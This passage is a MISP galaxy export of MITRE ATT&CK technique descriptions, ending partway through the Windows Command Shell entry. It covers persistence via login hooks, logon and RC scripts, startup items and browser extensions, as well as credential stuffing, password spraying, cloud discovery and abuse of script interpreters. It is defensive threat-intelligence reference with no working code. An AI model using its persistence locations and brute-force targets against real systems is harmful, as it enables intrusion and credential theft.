Adversaries may use a Login Hook to establish persistence by executing a script upon user logon. A login hook is a plist file that points to a specific script to execute with root privileges upon user logon. The plist file is located in the /Library/Preferences/com.apple.loginwindow.plist file and can be modified using the defaults command-line utility. This behavior is the same for logout hooks, where a script can be executed upon user logout. Creating or modifying any hook requires administrator permissions.[Login Scripts Apple Dev][LoginWindowScripts Apple Dev]

Adversaries can add or insert a path to a malicious script in the com.apple.loginwindow.plist file, using the LoginHook or LogoutHook key-value pair. The malicious script is executed upon the next user login. If a login hook already exists, adversaries can add additional commands to an existing login hook. There can be only one login and logout hook on a system at a time.[S1 macOs Persistence][Wardle Persistence Chapter]

Note: Login hooks were deprecated in macOS 10.11 in favor of Launch Daemon and Launch Agent.

Internal MISP references

UUID fdf95fac-f7f2-4901-b5fe-b2bafa443939 which can be used as unique global reference for Login Hook in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1037.002
Related clusters

To see the related clusters, click here.

Logon Script (Windows)

Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users logs into a system.[TechNet Logon Scripts] This is done by adding a path to a script to the HKCU\Environment\UserInitMprLogonScript Registry key.[Hexacorn Logon Scripts]

Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.

Internal MISP references

UUID b34ba0fd-493c-4e68-91c4-918f495ad07c which can be used as unique global reference for Logon Script (Windows) in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1037.001
Related clusters

To see the related clusters, click here.

Network Logon Script

Adversaries may use network logon scripts automatically executed at logon initialization to establish persistence. Network logon scripts can be assigned using Active Directory or Group Policy Objects.[Petri Logon Script AD] These logon scripts run with the privileges of the user they are assigned to. Depending on the systems within the network, initializing one of these scripts could apply to more than one or potentially all systems.

Adversaries may use these scripts to maintain persistence on a network. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.

Internal MISP references

UUID 3701f955-596b-422e-9fce-09c4f49cf080 which can be used as unique global reference for Network Logon Script in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1037.003
Related clusters

To see the related clusters, click here.

RC Scripts

Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.

Adversaries can establish persistence by adding a malicious binary path or shell commands to rc.local, rc.common, and other RC scripts specific to the Unix-like distribution.[IranThreats Kittens Dec 2017][Intezer HiddenWasp Map 2019] Upon reboot, the system executes the script's contents as root, resulting in persistence.

Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.[intezer-kaiji-malware]

Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of Launchd.[Apple Developer Doco Archive Launchd][Startup Items] This technique can be used on Mac OS X Panther v10.3 and earlier versions, which still execute the RC scripts.[Methods of Mac Malware Persistence] To maintain backwards compatibility, some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.[Ubuntu Manpage systemd rc]

Internal MISP references

UUID 46ef0f74-b028-4b35-8980-bed066feb60c which can be used as unique global reference for RC Scripts in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1037.004
Related clusters

To see the related clusters, click here.

Startup Items

Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.[Startup Items]

This is technically a deprecated technology (superseded by Launch Daemon), and thus the appropriate folder, /Library/StartupItems isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), StartupParameters.plist, reside in the top-level directory.

An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism.[Methods of Mac Malware Persistence] Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.

Internal MISP references

UUID 3d52cd7c-d81b-4762-9749-612bbbccb415 which can be used as unique global reference for Startup Items in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1037.005
Related clusters

To see the related clusters, click here.

Boot or Logon Initialization Scripts

Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely.

Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.

An adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.

Internal MISP references

UUID c51f799b-7305-43db-8d3b-657965cad68a which can be used as unique global reference for Boot or Logon Initialization Scripts in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Browser Extensions

Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.[Wikipedia Browser Extension][Chrome Extensions Definition]

Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores, so it may not be difficult for malicious extensions to defeat automated scanners.[Malicious Chrome Extension Numbers] Depending on the browser, adversaries may also manipulate an extension's update URL to install updates from an adversary-controlled server or manipulate the mobile configuration file to silently install additional extensions.

Prior to macOS 11, adversaries could silently install browser extensions via the command line using the profiles tool to install malicious .mobileconfig files. In macOS 11+, the profiles tool can no longer install configuration profiles; however, .mobileconfig files can be planted and installed with user interaction.[xorrior chrome extensions macOS]

Once the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials), and be used as an installer for a RAT for persistence.[Chrome Extension Crypto Miner][ICEBRG Chrome Extensions][Banker Google Chrome Extension Steals Creds][Catch All Chrome Extension]

There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions.[Stantinko Botnet] There have also been similar examples of extensions being used for command & control.[Chrome Extension C2 Malware]

Internal MISP references

UUID 040804f6-6a87-4011-8716-66682bc16ed4 which can be used as unique global reference for Browser Extensions in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Browser Information Discovery

Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.[Kaspersky Autofill]

Browser information may also highlight additional targets after an adversary has access to valid credentials, especially Credentials In Files associated with logins cached by a browser.

Specific storage locations vary based on platform and/or application, but browser information is typically stored in local files and databases (e.g., %APPDATA%/Google/Chrome).[Chrome Roaming Profiles]

Internal MISP references

UUID f1af5c8b-3210-4788-a873-97b1518bb43a which can be used as unique global reference for Browser Information Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Browser Session Hijacking

Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user behaviors, and intercept information as part of various browser session hijacking techniques.[Wikipedia Man in the Browser]

A specific example is when an adversary injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client certificates of a user then use the browser as a way to pivot into an authenticated intranet.[Cobalt Strike Browser Pivot][ICEBRG Chrome Extensions] Executing browser-based behaviors such as pivoting may require specific process permissions, such as SeDebugPrivilege and/or high-integrity/administrator rights.

Another example involves pivoting browser traffic from the adversary's browser through the user's browser by setting up a proxy which will redirect web traffic. This does not alter the user's traffic in any way, and the proxy connection can be severed as soon as the browser is closed. The adversary assumes the security context of whichever browser process the proxy is injected into. Browsers typically create a new process for each tab that is opened, and permissions and certificates are separated accordingly. With these permissions, an adversary could potentially browse to any resource on an intranet, such as SharePoint or webmail, that is accessible through the browser and to which the browser has sufficient permissions. Browser pivoting may also bypass security provided by 2-factor authentication.[cobaltstrike manual]

Internal MISP references

UUID b57c5554-5a46-42cd-be7e-4206f79ef424 which can be used as unique global reference for Browser Session Hijacking in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Credential Stuffing

Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.

Credential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies.

Typically, management services over commonly used ports are used when stuffing credentials. Commonly targeted services include the following:

  • SSH (22/TCP)
  • Telnet (23/TCP)
  • FTP (21/TCP)
  • NetBIOS / SMB / Samba (139/TCP & 445/TCP)
  • LDAP (389/TCP)
  • Kerberos (88/TCP)
  • RDP / Terminal Services (3389/TCP)
  • HTTP/HTTP Management Services (80/TCP & 443/TCP)
  • MSSQL (1433/TCP)
  • Oracle (1521/TCP)
  • MySQL (3306/TCP)
  • VNC (5900/TCP)

In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.[US-CERT TA18-068A 2018]

Internal MISP references

UUID 6d300882-d404-4f77-a19d-4a2f2b786702 which can be used as unique global reference for Credential Stuffing in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1110.004

Password Cracking

Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes is obtained. OS Credential Dumping can be used to obtain password hashes, but this may only get an adversary so far when Pass the Hash is not an option. Further, adversaries may leverage Data from Configuration Repository in order to obtain hashed credentials for network devices.[US-CERT-TA18-106A]

Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.[Wikipedia Password cracking] The plaintext password recovered from a successfully cracked hash may be used to log into systems, resources, and services to which the account has access.

Internal MISP references

UUID 7e8c3c70-2e9f-4fa0-b083-ff5610447dc1 which can be used as unique global reference for Password Cracking in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1110.002

Password Guessing

Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.

Guessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies.[Cylance Cleaver]

Typically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following:

  • SSH (22/TCP)
  • Telnet (23/TCP)
  • FTP (21/TCP)
  • NetBIOS / SMB / Samba (139/TCP & 445/TCP)
  • LDAP (389/TCP)
  • Kerberos (88/TCP)
  • RDP / Terminal Services (3389/TCP)
  • HTTP/HTTP Management Services (80/TCP & 443/TCP)
  • MSSQL (1433/TCP)
  • Oracle (1521/TCP)
  • MySQL (3306/TCP)
  • VNC (5900/TCP)
  • SNMP (161/UDP and 162/TCP/UDP)

In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.[US-CERT TA18-068A 2018] Further, adversaries may abuse network device interfaces (such as wlanAPI) to brute force accessible Wi-Fi routers via wireless authentication protocols.[Trend Micro Emotet 2020]

In default environments, failed LDAP and Kerberos connection attempts are less likely to generate events than failed attempts over SMB, which create Windows "logon failure" event ID 4625.

Internal MISP references

UUID e849ebcc-e0af-45a5-aefa-c394bb759b4e which can be used as unique global reference for Password Guessing in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1110.001

Password Spraying

Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords.[BlackHillsInfosec Password Spraying]

Typically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:

  • SSH (22/TCP)
  • Telnet (23/TCP)
  • FTP (21/TCP)
  • NetBIOS / SMB / Samba (139/TCP & 445/TCP)
  • LDAP (389/TCP)
  • Kerberos (88/TCP)
  • RDP / Terminal Services (3389/TCP)
  • HTTP/HTTP Management Services (80/TCP & 443/TCP)
  • MSSQL (1433/TCP)
  • Oracle (1521/TCP)
  • MySQL (3306/TCP)
  • VNC (5900/TCP)

In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.[US-CERT TA18-068A 2018]

In default environments, failed LDAP and Kerberos connection attempts are less likely to generate events than failed attempts over SMB, which create Windows "logon failure" event ID 4625.

Internal MISP references

UUID e63414a7-c6f7-4bcf-a6eb-25b0c4ddbb2a which can be used as unique global reference for Password Spraying in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1110.003

Brute Force

Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.

Brute forcing credentials may take place at various points during a breach. For example, adversaries may attempt to brute force access to Valid Accounts within a victim environment leveraging knowledge gathered from other post-compromise behaviors such as OS Credential Dumping, Account Discovery, or Password Policy Discovery. Adversaries may also combine brute forcing activity with behaviors such as External Remote Services as part of Initial Access.

Internal MISP references

UUID c16eef78-232e-47a2-98e9-046ec075b13c which can be used as unique global reference for Brute Force in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Containers', 'Google Workspace', 'IaaS', 'Linux', 'macOS', 'Network', 'Office 365', 'SaaS', 'Windows']
source MITRE

Build Image on Host

Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote build request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.[Docker Build Image]

An adversary may take advantage of that build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they may utilize Deploy Container using that custom image.[Aqua Build Images on Hosts][Aqua Security Cloud Native Threat Report June 2021] If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment.

Internal MISP references

UUID 49749e13-48ed-49fc-82d1-13ae13b457c1 which can be used as unique global reference for Build Image on Host in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers']
source MITRE

Clipboard Data

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

For example, on Windows adversaries can access clipboard data by using clip.exe or Get-Clipboard.[MSDN Clipboard][clip_win_server][CISA_AA21_200B] Additionally, adversaries may monitor and then replace the contents of users’ clipboards with their own data (e.g., Transmitted Data Manipulation).[mining_ruby_reversinglabs]

macOS and Linux also have commands, such as pbpaste, to grab clipboard contents.[Operating with EmPyre]

Internal MISP references

UUID e8f90b73-2e59-4643-a274-78b85b8d9f88 which can be used as unique global reference for Clipboard Data in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE

Cloud Administration Command

Adversaries may abuse cloud management services to execute commands within virtual machines or hybrid-joined devices. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. Similarly, in Azure AD environments, Microsoft Endpoint Manager allows Global or Intune Administrators to run scripts as SYSTEM on on-premises devices joined to the Azure AD.[AWS Systems Manager Run Command][Microsoft Run Command][SpecterOps Lateral Movement from Azure to On-Prem AD 2020]

If an adversary gains administrative access to a cloud environment, they may be able to abuse cloud management services to execute commands in the environment’s virtual machines or on-premises hybrid-joined devices. Additionally, an adversary that compromises a service provider or delegated administrator account may similarly be able to leverage a Trusted Relationship to execute commands in connected virtual machines.[MSTIC Nobelium Oct 2021]

Internal MISP references

UUID 944a7b91-c58e-567d-9e2c-515b93713c50 which can be used as unique global reference for Cloud Administration Command in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'IaaS']
source MITRE

Cloud Infrastructure Discovery

An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.

Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket API to determine a bucket’s existence along with access permissions of the request sender, or the GetPublicAccessBlock API to retrieve access block configuration for a bucket.[Amazon Describe Instance][Amazon Describe Instances API][AWS Get Public Access Block][AWS Head Bucket] Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project [Google Compute Instances], and Azure's CLI command az vm list lists details of virtual machines.[Microsoft AZ CLI] In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through Wordlist Scanning.[Malwarebytes OSINT Leaky Buckets - Hioureas]

An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.[Expel IO Evil in AWS] The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.[Mandiant M-Trends 2020] An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries may also use infrastructure discovery APIs such as DescribeDBInstances to determine size, owner, permissions, and network ACLs of database resources.[AWS Describe DB Instances] Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in Cloud Service Discovery, this technique focuses on the discovery of components of the provided services rather than the services themselves.

Internal MISP references

UUID fd346e4e-b22f-4cae-bc24-946d7b14b5e1 which can be used as unique global reference for Cloud Infrastructure Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS']
source MITRE

Cloud Service Dashboard

An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.[Google Command Center Dashboard]

Depending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This allows the adversary to gain information without making any API requests.

Internal MISP references

UUID 315ce434-ad6d-4dae-a1dd-6db944a44422 which can be used as unique global reference for Cloud Service Dashboard in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Google Workspace', 'IaaS', 'Office 365']
source MITRE

Cloud Service Discovery

An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.

Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.[Azure - Resource Manager API][Azure AD Graph API]

For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.[Azure - Stormspotter][GitHub Pacu]

Adversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through Disable or Modify Tools or Disable or Modify Cloud Logs.

Internal MISP references

UUID 5d0a3722-52b6-4968-a367-7ca6bc9a33fc which can be used as unique global reference for Cloud Service Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Google Workspace', 'IaaS', 'Office 365', 'SaaS']
source MITRE

Cloud Storage Object Discovery

Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage. Similar to File and Directory Discovery on a local host, after identifying available storage services (i.e. Cloud Infrastructure Discovery) adversaries may access the contents/objects stored in cloud infrastructure.

Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS[ListObjectsV2] and List Blobs in Azure.[List Blobs]

Internal MISP references

UUID 92761d92-a288-4407-a112-bb2720f07d07 which can be used as unique global reference for Cloud Storage Object Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS']
source MITRE

AppleScript

Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.[Apple AppleScript] These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.

Scripts can be run from the command-line via osascript /path/to/script or osascript -e "script here". Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding #!/usr/bin/osascript to the start of the script file.[SentinelOne AppleScript]

AppleScripts do not need to call osascript to execute; they may instead be executed from within Mach-O binaries by using the macOS Native APIs NSAppleScript or OSAScript, both of which execute code independently of the /usr/bin/osascript command line utility.

Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute Native APIs, which otherwise would require compilation and execution in a mach-O binary file format.[SentinelOne macOS Red Team] Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via Python.[Macro Malware Targets Macs]

Internal MISP references

UUID 9f06ef9b-d587-41d3-8fc8-7d539dac5701 which can be used as unique global reference for AppleScript in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1059.002

Cloud API

Adversaries may abuse cloud APIs to execute malicious commands. APIs available in cloud environments provide various functionalities and are a feature-rich method for programmatic access to nearly all aspects of a tenant. These APIs may be utilized through various methods such as command line interpreters (CLIs), in-browser Cloud Shells, PowerShell modules like Azure for PowerShell[Microsoft - Azure PowerShell], or software developer kits (SDKs) available for languages such as Python.

Cloud API functionality may allow for administrative access across all major services in a tenant such as compute, storage, identity and access management (IAM), networking, and security policies.

With proper permissions (often via use of credentials such as Application Access Token and Web Session Cookie), adversaries may abuse cloud APIs to invoke various functions that execute malicious actions. For example, CLI and PowerShell functionality may be accessed through binaries installed on cloud-hosted or on-premises hosts or accessed through a browser-based cloud shell offered by many cloud platforms (such as AWS, Azure, and GCP). These cloud shells are often a packaged unified environment to use CLI and/or scripting modules hosted as a container in the cloud environment.

Internal MISP references

UUID af798e80-2cc5-5452-83e4-9560f08bf2d5 which can be used as unique global reference for Cloud API in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1059.009

JavaScript

Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.[NodeJS]

JScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the Component Object Model and Internet Explorer HTML Application (HTA) pages.[JScrip May 2018][Microsoft JScript 2007][Microsoft Windows Scripts]

JavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple’s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple’s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple’s internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and AppleScript. Scripts can be executed via the command line utility osascript, they can be compiled into applications or script files via osacompile, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.[Apple About Mac Scripting 2016][SpecterOps JXA 2020][SentinelOne macOS Red Team][Red Canary Silver Sparrow Feb2021][MDSec macOS JXA and VSCode]

Adversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a Drive-by Compromise or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of Obfuscated Files or Information.

Internal MISP references

UUID 8a669da8-8894-4fb0-9124-c3c8418985cc which can be used as unique global reference for JavaScript in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1059.007

Network Device CLI

Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious commands and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands.

Scripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or SSH.

Adversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection.[Cisco Synful Knock Evolution]

Internal MISP references

UUID 284bfbb3-99f0-4c3d-bc1f-ab74065b7907 which can be used as unique global reference for Network Device CLI in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1059.008

PowerShell

Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.[TechNet PowerShell] Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).

PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.

A number of PowerShell-based offensive testing tools are available, including Empire, PowerSploit, PoshC2, and PSAttack.[Github PSAttack]

PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).[Sixdub PowerPick Jan 2016][SilentBreak Offensive PS Dec 2015][Microsoft PSfromCsharp APR 2014]

Internal MISP references

UUID 6ca7838a-e8ad-43e8-9da6-15b640d1cbde which can be used as unique global reference for PowerShell in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1059.001

Python

Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the python.exe interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.

Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.

Internal MISP references

UUID 68fed1c9-e060-4c4d-83d9-d8c817893d65 which can be used as unique global reference for Python in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1059.006

Unix Shell

Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.[DieNet Bash][Apple ZShell] Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.

Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.

Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with SSH. Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.

Internal MISP references

UUID 3eafcd8b-0cb8-4d23-8785-3f80a3c897c7 which can be used as unique global reference for Unix Shell in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1059.004

Visual Basic

Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as Component Object Model and the Native API through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.[VB .NET Mar 2020][VB Microsoft]

Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.[Microsoft VBA][Wikipedia VBA] VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of JavaScript on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).[Microsoft VBScript]

Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into Spearphishing Attachment payloads (which may also involve Mark-of-the-Web Bypass to enable execution).[Default VBS macros Blocking]

Internal MISP references

UUID 0340ed34-6db2-4979-bf73-2c16855867b4 which can be used as unique global reference for Visual Basic in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1059.005

Windows Command Shell

Adversaries may abuse the Windows command shell for execution. The Windows command shell (cmd) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via Remote Services such as SSH.[SSH in Windows]

